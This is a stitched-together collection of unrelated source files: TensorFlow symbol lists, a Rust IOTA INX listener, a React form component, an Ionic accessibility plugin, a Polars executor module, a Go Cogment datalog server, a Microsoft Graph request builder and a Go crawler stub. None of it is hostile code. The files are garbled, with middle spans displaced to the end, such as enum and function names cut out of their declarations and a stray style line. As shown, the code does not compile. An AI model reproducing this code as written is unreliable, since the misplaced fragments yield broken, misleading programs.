_allowed_symbols_clip_ops = [ # Documented in training.py: # Not importing training.py to avoid complex graph dependencies. "clip_by_average_norm", "clip_by_global_norm", "clip_by_norm", "clip_by_value", "global_norm", ] _allowed_symbols_logging_ops = [ # Documented in training.py. # We are not importing training.py to avoid complex dependencies. "audio_summary", "histogram_summary", "image_summary", "merge_all_summaries", "merge_summary", "scalar_summary", # TODO(drpng): link in training.py if it should be documented. "get_summary_op", ] _allowed_symbols_variable_scope_ops = [ "get_local_variable", # Documented in framework package. ] _allowed_symbols_misc = [ "deserialize_many_sparse", "parse_single_sequence_example", "serialize_many_sparse", "serialize_sparse", "confusion_matrix", ] _allowed_symbols = (_allowed_symbols_array_ops + _allowed_symbols_clip_ops + _allowed_symbols_control_flow_ops + _allowed_symbols_functional_ops + _allowed_symbols_gradients + _allowed_symbols_logging_ops + _allowed_symbols_math_ops + _allowed_symbols_variable_scope_ops + _allowed_symbols_misc + _allowed_symbols_partitioned_variables) remove_undocumented(__name__, _allowed_symbols, [ _sys.modules[__name__], _array_ops, _check_ops, _clip_ops, _confusion_matrix, _control_flow_ops, _constant_op, _data_flow_ops, _functional_ops, _gradients, _histogram_ops, _init_ops, _io_ops, _linalg_ops, _logging_ops, _manip_ops, _math_ops, _numerics, _parsing_ops, _partitioned_variables, _random_ops, _script_ops, _session_ops,
_string_ops, _template, _tensor_array_ops, _variable_scope, _variables, ])
_sparse_ops, _special_math_ops, _state_ops,
listener.rs
// Copyright 2022 IOTA Stiftung // SPDX-License-Identifier: Apache-2.0 //! The [`InxListener`] subscribes to events from INX and forwards them via a Tokio unbounded //! channel. use std::{fmt::Debug, marker::PhantomData}; use async_trait::async_trait; use chronicle::runtime::{Actor, ActorContext, ActorError, ConfigureActor, HandleEvent, Report}; use inx::{ client::InxClient, proto::NoParams, tonic::{Channel, Status}, }; use thiserror::Error; use crate::collector::Collector; type BlockStream = InxStreamListener<inx::proto::Block>; type BlockMetadataStream = InxStreamListener<inx::proto::BlockMetadata>; type MilestoneStream = InxStreamListener<inx::proto::Milestone>; #[derive(Debug, Error)] pub enum
{ #[error("the collector is not running")] MissingCollector, #[error("failed to subscribe to stream: {0}")] SubscriptionFailed(#[from] inx::tonic::Status), #[error(transparent)] Runtime(#[from] crate::RuntimeError), } #[derive(Debug)] pub struct InxListener { inx_client: InxClient<Channel>, } impl InxListener { // TODO: Should we check for broker actor here too? pub fn new(inx_client: InxClient<Channel>) -> Self { Self { inx_client } } } #[async_trait] impl Actor for InxListener { type State = (); type Error = StardustInxListenerError; async fn init(&mut self, cx: &mut ActorContext<Self>) -> Result<Self::State, Self::Error> { let block_stream = self.inx_client.listen_to_blocks(NoParams {}).await?.into_inner(); cx.spawn_child::<BlockStream, _>( InxStreamListener::default() .with_stream(block_stream) .with_registration(false), ) .await; let metadata_stream = self .inx_client .listen_to_referenced_blocks(NoParams {}) .await? .into_inner(); cx.spawn_child::<BlockMetadataStream, _>( InxStreamListener::default() .with_stream(metadata_stream) .with_registration(false), ) .await; let milestone_stream = self .inx_client .listen_to_confirmed_milestones(inx::proto::MilestoneRangeRequest::from(..)) .await? .into_inner(); cx.spawn_child::<MilestoneStream, _>( InxStreamListener::default() .with_stream(milestone_stream) .with_registration(false), ) .await; Ok(()) } } #[async_trait] impl HandleEvent<Report<BlockStream>> for InxListener { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Report<BlockStream>, _state: &mut Self::State, ) -> Result<(), Self::Error> { match event { Report::Success(_) => { cx.shutdown(); } Report::Error(e) => match e.error { ActorError::Result(_) => { let block_stream = self.inx_client.listen_to_blocks(NoParams {}).await?.into_inner(); cx.spawn_child::<BlockStream, _>( InxStreamListener::default() .with_stream(block_stream) .with_registration(false), ) .await; } ActorError::Aborted | ActorError::Panic => { cx.shutdown(); } }, } Ok(()) } } #[async_trait] impl HandleEvent<Report<BlockMetadataStream>> for InxListener { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Report<BlockMetadataStream>, _state: &mut Self::State, ) -> Result<(), Self::Error> { match event { Report::Success(_) => { cx.shutdown(); } Report::Error(e) => match e.error { ActorError::Result(_) => { let block_stream = self .inx_client .listen_to_referenced_blocks(NoParams {}) .await? .into_inner(); cx.spawn_child::<BlockMetadataStream, _>( InxStreamListener::default() .with_stream(block_stream) .with_registration(false), ) .await; } ActorError::Aborted | ActorError::Panic => { cx.shutdown(); } }, } Ok(()) } } #[async_trait] impl HandleEvent<Report<MilestoneStream>> for InxListener { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Report<MilestoneStream>, _state: &mut Self::State, ) -> Result<(), Self::Error> { match event { Report::Success(_) => { cx.shutdown(); } Report::Error(e) => match e.error { ActorError::Result(_) => { let milestone_stream = self .inx_client .listen_to_confirmed_milestones(inx::proto::MilestoneRangeRequest::from(..)) .await? .into_inner(); cx.spawn_child::<MilestoneStream, _>( InxStreamListener::default() .with_stream(milestone_stream) .with_registration(false), ) .await; } ActorError::Aborted | ActorError::Panic => { cx.shutdown(); } }, } Ok(()) } } pub struct InxStreamListener<I> { // This funky phantom fn pointer is so that the type impls Send + Sync _item: PhantomData<fn(I) -> I>, } impl<I> Default for InxStreamListener<I> { fn default() -> Self { Self { _item: PhantomData } } } #[async_trait] impl<E> Actor for InxStreamListener<E> where Collector: HandleEvent<E>, E: 'static + Send, { type State = (); type Error = StardustInxListenerError; async fn init(&mut self, _cx: &mut ActorContext<Self>) -> Result<Self::State, Self::Error> { Ok(()) } } #[async_trait] impl<E> HandleEvent<Result<E, Status>> for InxStreamListener<E> where Self: Actor<Error = StardustInxListenerError>, Collector: HandleEvent<E>, E: 'static + Send, { async fn handle_event( &mut self, cx: &mut ActorContext<Self>, event: Result<E, Status>, _state: &mut Self::State, ) -> Result<(), Self::Error> { cx.addr::<Collector>() .await .send(event?) .map_err(|_| StardustInxListenerError::MissingCollector)?; Ok(()) } } impl<I> Debug for InxStreamListener<I> { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct("InxStreamListener") .field("item", &std::any::type_name::<I>()) .finish() } }
StardustInxListenerError
field.js
import { AutoSuggestDropdown, DropDown, Label, MobileNumberField, SingleCheckbox, TextField, TextFieldIcon } from "components"; import { AutosuggestContainer } from "egov-ui-framework/ui-containers"; import React from "react"; import { RadioButton } from "../components"; const styles = { radioButtonStyle: { display: 'flex', position: 'inherit', top: '-5px' }, labelStyle: { font: "12px",
marginBottom: 5, marginTop: 14, }, radioButtonItemStyle: { marginBottom: "18px", paddingLeft: "2px", height: "16px", }, selectedLabelStyle: { color: 'rgba(0, 0, 0, 0.44)', }, radioButtonLabelStyle: { // lineHeight: 1, // marginBottom: 8, }, iconStyle: { width: 16, height: 27, }, }; const Field = ({ fieldKey, handleFieldChange, field = {}, disabled, onTextFieldIconClick, ...rest }) => { const renderField = () => { const { type, tooltip, label, hideField, Icon, iconRedirectionURL, visible, ...fieldProps } = field; if (fieldProps.dropDownData && fieldProps.dropDownData.length > 0) { fieldProps.dropDownData.map((data, key) => { fieldProps.dropDownData[key].code = data.value; fieldProps.dropDownData[key].name = data.label; }); } if (hideField) return null; switch (type) { case "textfield": case "textarea": return <TextField {...rest} {...fieldProps} onChange={(e, value) => handleFieldChange(fieldKey, value)} multiLine={type === "textarea"} disabled={disabled || fieldProps.disabled} />; case "mobilenumber": return <MobileNumberField {...rest} {...fieldProps} onChange={(e, value) => handleFieldChange(fieldKey, value)} disabled={disabled || fieldProps.disabled} />; case "number": case "password": return <TextField {...rest} {...fieldProps} type={type} onChange={(e, value) => handleFieldChange(fieldKey, value)} disabled={disabled || fieldProps.disabled} />; case "checkbox": return ( <SingleCheckbox {...rest} {...fieldProps} style={{ marginTop: "27px" }} onCheck={(e) => handleFieldChange(fieldKey, e.target.checked)} disabled={disabled || fieldProps.disabled} /> ); case "label": return <Label {...rest} {...fieldProps} />; case "singleValueList": return ( <DropDown {...rest} {...fieldProps} dropDownData={fieldProps.dropDownData || []} onChange={(e, value, selectedValue) => handleFieldChange(fieldKey, selectedValue)} /> ); case "textFieldIcon": return ( <TextFieldIcon iconPosition="right" Icon={Icon} {...fieldProps} {...rest} onIconClick={ iconRedirectionURL ? () => { window.open(iconRedirectionURL); } : () => onTextFieldIconClick() } onChange={(e, value) => handleFieldChange(fieldKey, value)} /> ); case "autoSuggestDropdown": return ( <AutoSuggestDropdown {...rest} {...fieldProps} dataSource={fieldProps && fieldProps.dropDownData || []} onChange={(chosenRequest, index) => { handleFieldChange(fieldKey, chosenRequest.value); }} /> ); case "radioButton": return ( <div> {visible !== false ? <RadioButton {...rest} {...fieldProps} style={styles.radioButtonStyle} options={fieldProps && fieldProps.options || []} radioButtonItemStyle={styles.radioButtonItemStyle} radioButtonLabelStyle={styles.radioButtonLabelStyle} selectedLabelStyle={styles.selectedLabelStyle} className={`radio-button-${fieldProps.id}`} iconStyle={styles.iconStyle} labelStyle={styles.radioButtonLabelStyle} valueSelected={fieldProps.value} handleChange={(e, value) => { handleFieldChange(fieldKey, value); }} ></RadioButton> : ""} </div> ); case "AutocompleteDropdown": return ( <AutosuggestContainer id={fieldProps.id} type={fieldProps.type} required={fieldProps.required} jsonPath={fieldProps.jsonPath} localePrefix={fieldProps.localePrefix} data={fieldProps && fieldProps.dropDownData} className="autocomplete-dropdown" label={{ labelKey: fieldProps.floatingLabelText }} placeholder={{ labelKey: fieldProps.hintText }} labelsFromLocalisation={fieldProps.labelsFromLocalisation} gridDefination={fieldProps.gridDefination} toolTip={fieldProps.toolTip} toolTipMessage={fieldProps.toolTipMessage} boundary={fieldProps.boundary} errorMessage={fieldProps.errorMessage} errorStyle={fieldProps.errorStyle} pattern={fieldProps.pattern} value={fieldProps.value} defaultSort={fieldProps.defaultSort} canFetchValueFromJsonpath={false} formName={fieldProps.formName} isClearable={true} disabled={disabled || fieldProps.disabled} onChange={(chosenRequest, index) => { handleFieldChange(fieldKey, chosenRequest.target.value, fieldProps.jsonPath); }} /> ); default: return null; } }; return renderField(); }; export default Field;
letterSpacing: 0.6,
index.ts
import { Plugin, Cordova, IonicNativePlugin } from '@ionic-native/core'; import { Injectable } from '@angular/core'; /** * @name Mobile Accessibility * @description * This plugin exposes information on the status of various accessibility features of mobile operating systems, including, for example, whether a screen reader is running, invert colors is enabled, and the preferred scaling for text. * It also allows an application to send a string to be spoken by the screen reader, or a command to stop the screen reader from speaking. * * @usage * ```typescript * import { MobileAccessibility } from 'ionic-native'; * * * constructor(private mobileAccessibility: MobileAccessibility) { } * * ... * * if(this.mobileAccessibility.isScreenReaderRunningCallback(); * * ``` */ @Plugin({ pluginName: 'MobileAccessibility', plugin: 'phonegap-plugin-mobile-accessibility', pluginRef: 'MobileAccessibility', repo: 'https://github.com/phonegap/phonegap-mobile-accessibility', platforms: ['Android Fire OS', 'Android', 'iOS', 'Windows'] }) @Injectable() export class MobileAccessibility extends IonicNativePlugin { MobileAccessibilityNotifications: { ANNOUNCEMENT: 'ANNOUNCEMENT', BOLD_TEXT_STATUS_CHANGED: 'BOLD_TEXT_STATUS_CHANGED', CLOSED_CAPTIONING_STATUS_CHANGED: 'CLOSED_CAPTIONING_STATUS_CHANGED', DARKER_SYSTEM_COLORS_STATUS_CHANGED: 'DARKER_SYSTEM_COLORS_STATUS_CHANGED', GRAYSCALE_STATUS_CHANGED: 'GRAYSCALE_STATUS_CHANGED', GUIDED_ACCESS_STATUS_CHANGED: 'GUIDED_ACCESS_STATUS_CHANGED', INVERT_COLORS_STATUS_CHANGED: 'INVERT_COLORS_STATUS_CHANGED', LAYOUT_CHANGED: 'LAYOUT_CHANGED', MONO_AUDIO_STATUS_CHANGED: 'MONO_AUDIO_STATUS_CHANGED', PAGE_SCROLLED: 'PAGE_SCROLLED', REDUCE_MOTION_STATUS_CHANGED: 'REDUCE_MOTION_STATUS_CHANGED', REDUCE_TRANSPARENCY_STATUS_CHANGED: 'REDUCE_TRANSPARENCY_STATUS_CHANGED', SCREEN_CHANGED: 'SCREEN_CHANGED', SCREEN_READER_STATUS_CHANGED: 'SCREEN_READER_STATUS_CHANGED', SPEAK_SCREEN_STATUS_CHANGED: 'SPEAK_SCREEN_STATUS_CHANGED', SPEAK_SELECTION_STATUS_CHANGED: 'SPEAK_SELECTION_STATUS_CHANGED', SWITCH_CONTROL_STATUS_CHANGED: 'SWITCH_CONTROL_STATUS_CHANGED', TOUCH_EXPLORATION_STATUS_CHANGED: 'TOUCH_EXPLORATION_STATUS_CHANGED' }; /** * Makes an asynchronous call to native MobileAccessibility to determine if a screen reader is running. * @returns {Promise<boolean>} A result method to receive the boolean result asynchronously from the native MobileAccessibility plugin. */ @Cordova() isScreenReaderRunning(): Promise<boolean> { return; } /** * An iOS-specific proxy for the MobileAccessibility.isScreenReaderRunning method * @returns {Promise<boolean>} A result method to receive the boolean result asynchronously from the native MobileAccessibility plugin. */ @Cordova({ platforms: ['iOS'] }) isVoiceOverRunning(): Promise<boolean> { return; } /** * An Android/Amazon Fire OS-specific proxy for the MobileAccessibility.isScreenReaderRunning method. * @returns {Promise<boolean>} A result method to receive the boolean result asynchronously from the native MobileAccessibility plugin. */ @Cordova({ platforms: ['Amazon Fire OS', 'Android'] }) isTalkBackRunning(): Promise<boolean> { return; } /** * On Android, this method returns true if ChromeVox is active and properly initialized with access to the text to speech API in the WebView. * If TalkBack is running but ChromeVox is not active, this method is useful to alert the user of a potential problem. * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['Amazon Fire OS', 'Android'] }) isChromeVoxActive(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isBoldTextEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova() isClosedCaptioningEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isDarkerSystemColorsEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isGrayscaleEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isGuidedAccessEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isInvertColorsEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isMonoAudioEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isReduceMotionEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isReduceTransparencyEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isSpeakScreenEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isSpeakSelectionEnabled(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) isSwitchControlRunning(): Promise<boolean> { return; } /** * * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['Amazon Fire OS', 'Android'] }) isTouchExplorationEnabled(): Promise<boolean> { return; } /** * * * @returns {Promise<number>} Returns the result */ @Cordova() getTextZoom(): Promise<number> { return; } /** * @param textZoom {number} A percentage value by which text in the WebView should be scaled. */ @Cordova({ sync: true }) setTextZoom(textZoom: number): void { } /** * */ @Cordova({ sync: true }) updateTextZoom(): void { } /** * A Boolean value which specifies whether to use the preferred text zoom of a default percent value of 100. * @param value {boolean} Returns the result */ @Cordova({ sync: true }) usePreferredTextZoom(value: boolean): void { } /**
* Posts a notification with a string for the screen reader to announce if it is running. * @param mobileAccessibilityNotification {any} * @param value {string} A string to be announced by a screen reader. * @returns {Promise<boolean>} Returns the result */ @Cordova({ platforms: ['iOS'] }) postNotification(mobileAccessibilityNotification: any, value: string): Promise<boolean> { return; } /** * Speaks a given string through the screenreader. On Android, if ChromeVox is active, it will use the specified queueMode and properties. * @param value {string} * @param queueMode {mumber} * @param properties {any} */ @Cordova({ sync: true }) speak(value: string, queueMode?: number, properties?: any): void { } /** * Stops speech. */ @Cordova({ sync: true }) stop(): void { } }
mod.rs
pub mod cache; pub mod drop_duplicates; pub mod explode; pub mod filter; pub mod groupby; pub mod join; pub mod melt; pub mod scan; pub mod slice; pub mod sort; pub mod stack; pub mod udf; pub mod various; use super::*; use crate::logical_plan::FETCH_ROWS; use itertools::Itertools; use polars_core::POOL; use rayon::prelude::*; use std::io::Seek; use std::path::PathBuf; const POLARS_VERBOSE: &str = "POLARS_VERBOSE"; fn set_n_rows(stop_after_n_rows: Option<usize>) -> Option<usize> { let fetch_rows = FETCH_ROWS.with(|fetch_rows| fetch_rows.get()); match fetch_rows { None => stop_after_n_rows, Some(n) => Some(n), } } pub(crate) fn evaluate_physical_expressions( df: &DataFrame, exprs: &[Arc<dyn PhysicalExpr>], state: &ExecutionState, ) -> Result<DataFrame> { let height = df.height(); let mut selected_columns = POOL.install(|| { exprs .par_iter() .map(|expr| expr.evaluate(df, state)) .collect::<Result<Vec<Series>>>() })?; // If all series are the same length it is ok. If not we can broadcast Series of length one. if selected_columns.len() > 1 { let all_equal_len = selected_columns.iter().map(|s| s.len()).all_equal(); if !all_equal_len { selected_columns = selected_columns .into_iter()
series.expand_at_index(0, height) } else { series } }) .collect() } } Ok(DataFrame::new_no_checks(selected_columns)) }
.map(|series| { if series.len() == 1 && height > 1 {
datalogServer.go
// Copyright 2022 AI Redefined Inc. <[email protected]> // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package grpcservers import ( "context" "io" "strings" grpcapi "github.com/cogment/cogment/grpcapi/cogment/api" "github.com/cogment/cogment/services/trialDatastore/backend" "github.com/openlyinc/pointy" "google.golang.org/grpc" "google.golang.org/grpc/codes" "google.golang.org/grpc/metadata" "google.golang.org/grpc/status" ) type datalogServer struct { grpcapi.UnimplementedDatalogSPServer backend backend.Backend } func actorIndexFromActorName(actorName string, actorIndices map[string]uint32) int32 { actorIndex, found := actorIndices[actorName] if !found { // If the actor is not found we consider it is the environment // TODO maybe use the actual environment "actor name" return -1 } return int32(actorIndex) } func trialSampleFromDatalogSample( trialID string, actorIndices map[string]uint32, datalogSample *grpcapi.DatalogSample, trialActors []*grpcapi.ActorParams, ) (*grpcapi.StoredTrialSample, error) { // Base stuffs sample := grpcapi.StoredTrialSample{ UserId: "", TrialId: trialID, TickId: datalogSample.Info.TickId, Timestamp: datalogSample.Info.Timestamp, State: datalogSample.Info.State, ActorSamples: make([]*grpcapi.StoredTrialActorSample, len(actorIndices)), Payloads: make([][]byte, 0), } // Initializing the actor samples for actorIndex := range sample.ActorSamples { sample.ActorSamples[actorIndex] = &grpcapi.StoredTrialActorSample{ Actor: uint32(actorIndex), } } // Deal with the observations if datalogSample.Observations != nil { payloadIndexFromObsIndex := make([]uint32, len(datalogSample.Observations.Observations)) for obsIndex, obsData := range datalogSample.Observations.Observations { payload := obsData payloadIndexFromObsIndex[obsIndex] = uint32(len(sample.Payloads)) sample.Payloads = append(sample.Payloads, payload) } for actorIndex, obsIndex := range datalogSample.Observations.ActorsMap { sample.ActorSamples[actorIndex].Observation = &payloadIndexFromObsIndex[obsIndex] } } // Deal with the actions { for actorIndex, action := range datalogSample.Actions { payload := action.Content payloadIndex := uint32(len(sample.Payloads)) sample.Payloads = append(sample.Payloads, payload) sample.ActorSamples[actorIndex].Action = &payloadIndex } } // Deal with the rewards { rewardAccumulator := make(map[uint32][]*grpcapi.RewardSource) for _, reward := range datalogSample.Rewards { // Potential wildcards in receiver name var rewardedActorIndices []uint32 splitName := strings.Split(reward.ReceiverName, ".") if reward.ReceiverName == "*" || reward.ReceiverName == "*.*" { for _, index := range actorIndices { rewardedActorIndices = append(rewardedActorIndices, index) } } else if len(splitName) > 1 { className := splitName[0] actorName := splitName[1] for index, actorParam := range trialActors { if actorParam.GetActorClass() == className && (actorName == "*" || actorName == actorParam.Name) { rewardedActorIndices = append(rewardedActorIndices, uint32(index)) } } } else { // Find actor sample that matches the reward index, exists := actorIndices[reward.ReceiverName] if exists { rewardedActorIndices = append(rewardedActorIndices, index) } else { log.WithField("receiver_name", reward.ReceiverName).Debug( "Unrecognized receiver name, not logging the reward") } } for _, actorIndex := range rewardedActorIndices { // Store the reward sources for aggregation later _, exists := rewardAccumulator[actorIndex] if !exists { rewardAccumulator[actorIndex] = make([]*grpcapi.RewardSource, 0) } for _, sourceReward := range reward.Sources { rewardAccumulator[actorIndex] = append(rewardAccumulator[actorIndex], sourceReward) var payloadIndex *uint32 if sourceReward.UserData != nil && len(sourceReward.UserData.Value) > 0 { payloadIndex = pointy.Uint32(uint32(len(sample.Payloads))) sample.Payloads = append(sample.Payloads, sourceReward.UserData.Value) } senderactorIndex := actorIndexFromActorName(sourceReward.SenderName, actorIndices) receivedReward := grpcapi.StoredTrialActorSampleReward{ Sender: senderactorIndex, Reward: sourceReward.Value, Confidence: sourceReward.Confidence, UserData: payloadIndex, } sample.ActorSamples[actorIndex].ReceivedRewards = append( sample.ActorSamples[actorIndex].ReceivedRewards, &receivedReward, ) if senderactorIndex >= 0 { sentReward := grpcapi.StoredTrialActorSampleReward{ Receiver: int32(actorIndex), Reward: sourceReward.Value, Confidence: sourceReward.Confidence, UserData: payloadIndex, } sample.ActorSamples[senderactorIndex].SentRewards = append( sample.ActorSamples[senderactorIndex].SentRewards, &sentReward, ) } } } } for actorIndex, sourcesList := range rewardAccumulator { // The total reward for an actor is the average value weighted by the confidence valueAccum := float32(0.0) confidenceAccum := float32(0.0) for _, source := range sourcesList { if source.Confidence > 0 { valueAccum += source.Value * source.Confidence confidenceAccum += source.Confidence } } if confidenceAccum > 0 { valueAccum /= confidenceAccum } sample.ActorSamples[actorIndex].Reward = pointy.Float32(valueAccum) } } // Deal with the messages { for _, message := range datalogSample.Messages { payloadIndex := uint32(len(sample.Payloads)) sample.Payloads = append(sample.Payloads, message.Payload.Value) receiveractorIndex := actorIndexFromActorName(message.ReceiverName, actorIndices) senderactorIndex := actorIndexFromActorName(message.SenderName, actorIndices) if receiveractorIndex >= 0 { receivedMessage := grpcapi.StoredTrialActorSampleMessage{ Sender: senderactorIndex, Payload: payloadIndex, } sample.ActorSamples[receiveractorIndex].ReceivedMessages = append( sample.ActorSamples[receiveractorIndex].ReceivedMessages, &receivedMessage, ) } if senderactorIndex >= 0 { sentMessage := grpcapi.StoredTrialActorSampleMessage{ Receiver: receiveractorIndex, Payload: payloadIndex, } sample.ActorSamples[senderactorIndex].SentMessages = append( sample.ActorSamples[senderactorIndex].SentMessages, &sentMessage, ) } } } return &sample, nil } func (s *datalogServer) RunTrialDatalog(stream grpcapi.DatalogSP_RunTrialDatalogServer) error { ctx := stream.Context() md, ok := metadata.FromIncomingContext(ctx) if !ok { return status.Errorf(codes.DataLoss, "DatalogServer.RunTrialDatalog: failed to get metadata") } trialIDs := md.Get("trial-id") if len(trialIDs) == 0 { return status.Errorf(codes.InvalidArgument, "DatalogServer.RunTrialDatalog: missing required header \"trial-id\"") } trialID := trialIDs[0] actorIndices := make(map[string]uint32) // Receive the first element, it should be trial data req, err := stream.Recv() if err != nil { return err } trialParams := req.GetTrialParams() if trialParams == nil { return status.Errorf( codes.InvalidArgument, "DatalogServer.RunTrialDatalog: initial message is not of type \"cogment.TrialParams\"", ) } err = s.backend.CreateOrUpdateTrials( ctx, []*backend.TrialParams{{TrialID: trialID, UserID: "log exporter server", Params: trialParams}}, ) if err != nil { return status.Errorf(codes.Internal, "DatalogServer.RunTrialDatalog: internal error %q", err) } // Acknowledge the handling of the first "params" message err = stream.Send(&grpcapi.RunTrialDatalogOutput{}) if err != nil { return err } for actorIndex, actorConfig := range trialParams.GetActors() { actorIndices[actorConfig.Name] = uint32(actorIndex) } for { req, err := stream.Recv() if err == io.EOF { return nil } if err != nil { return err } sample := req.GetSample() if sample == nil { return status.Errorf( codes.InvalidArgument, "DatalogServer.RunTrialDatalog: body message is not of type \"cogment.DatalogSample\"", ) } trialSample, err := trialSampleFromDatalogSample(trialID, actorIndices, sample, trialParams.GetActors()) if err != nil { return status.Errorf(codes.Internal, "DatalogServer.RunTrialDatalog: internal error %q", err) } err = s.backend.AddSamples(ctx, []*grpcapi.StoredTrialSample{trialSample}) if err != nil { return status.Errorf(codes.Internal, "DatalogServer.RunTrialDatalog: internal error %q", err) } // Acknowledge the handling of the following "sample" message err = stream.Send(&grpcapi.RunTrialDatalogOutput{}) if err != nil { return err } } } func (s *datalogServer) Version(context.Context, *grpcapi.VersionRequest) (*grpcapi.VersionInfo, error) { return nil, status.Errorf(codes.Unimplemented, "DatalogServer.Version not implemented") } // RegisterDatalogServer registers a DatalogServer to a gRPC server. func
(grpcServer grpc.ServiceRegistrar, backend backend.Backend) error { server := &datalogServer{ backend: backend, } grpcapi.RegisterDatalogSPServer(grpcServer, server) return nil }
RegisterDatalogServer
restore_request_builder.go
package restore import ( i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f "github.com/microsoft/kiota-abstractions-go" ) // RestoreRequestBuilder provides operations to call the restore method. type RestoreRequestBuilder struct { // Path parameters for the request pathParameters map[string]string // The request adapter to use to execute the requests. requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter // Url template to use to build the URL for the current request builder urlTemplate string } // RestoreRequestBuilderPostRequestConfiguration configuration for the request such as headers, query parameters, and middleware options. type RestoreRequestBuilderPostRequestConfiguration struct { // Request headers Headers map[string]string // Request options Options []i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestOption } // NewRestoreRequestBuilderInternal instantiates a new RestoreRequestBuilder and sets the default values. func NewRestoreRequestBuilderInternal(pathParameters map[string]string, requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter)(*RestoreRequestBuilder) { m := &RestoreRequestBuilder{ } m.urlTemplate = "{+baseurl}/me/joinedGroups/{group%2Did}/sites/{site%2Did}/lists/{list%2Did}/items/{listItem%2Did}/documentSetVersions/{documentSetVersion%2Did}/microsoft.graph.restore"; urlTplParams := make(map[string]string) for idx, item := range pathParameters { urlTplParams[idx] = item } m.pathParameters = urlTplParams; m.requestAdapter = requestAdapter; return m } // NewRestoreRequestBuilder instantiates a new RestoreRequestBuilder and sets the default values. func NewRestoreRequestBuilder(rawUrl string, requestAdapter i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestAdapter)(*RestoreRequestBuilder) { urlParams := make(map[string]string) urlParams["request-raw-url"] = rawUrl return NewRestoreRequestBuilderInternal(urlParams, requestAdapter) } // CreatePostRequestInformation invoke action restore func (m *RestoreRequestBuilder) CreatePostRequestInformation()(*i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestInformation, error) { return m.CreatePostRequestInformationWithRequestConfiguration(nil); } // CreatePostRequestInformationWithRequestConfiguration invoke action restore func (m *RestoreRequestBuilder) CreatePostRequestInformationWithRequestConfiguration(requestConfiguration *RestoreRequestBuilderPostRequestConfiguration)(*i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.RequestInformation, error) { requestInfo := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.NewRequestInformation() requestInfo.UrlTemplate = m.urlTemplate requestInfo.PathParameters = m.pathParameters requestInfo.Method = i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.POST if requestConfiguration != nil { requestInfo.AddRequestHeaders(requestConfiguration.Headers) requestInfo.AddRequestOptions(requestConfiguration.Options) } return requestInfo, nil } // Post invoke action restore func (m *RestoreRequestBuilder) Post()(error) { return m.PostWithRequestConfigurationAndResponseHandler(nil, nil); } // PostWithRequestConfigurationAndResponseHandler invoke action restore func (m *RestoreRequestBuilder) PostWithRequestConfigurationAndResponseHandler(requestConfiguration *RestoreRequestBuilderPostRequestConfiguration, responseHandler i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ResponseHandler)(error) { requestInfo, err := m.CreatePostRequestInformationWithRequestConfiguration(requestConfiguration); if err != nil
err = m.requestAdapter.SendNoContentAsync(requestInfo, responseHandler, nil) if err != nil { return err } return nil }
{ return err }
entry.go
package crawler import ( "fmt" "log" "os" "strconv" "sync" "github.com/pkg/errors" "github.com/rs/zerolog" "github.com/tebeka/selenium" "github.com/tebeka/selenium/firefox" "github.com/topics/sysexec" ) type Crawler struct { Mutex sync.Mutex URL string SeleniumPath string GeckoDriverPath string Port int WebDriver *selenium.WebDriver } var ( CR_DailyTrading = "DailyTrading" CR_DailyTradingRatio = "DailyTradingRatio" CR_Highlight = "Highlight" CR_StockInfo = "StockInfo" CR_TAIEX = "TAIEX" ) var c *Crawler func StartWebInstance() (*selenium.Service, *Crawler)
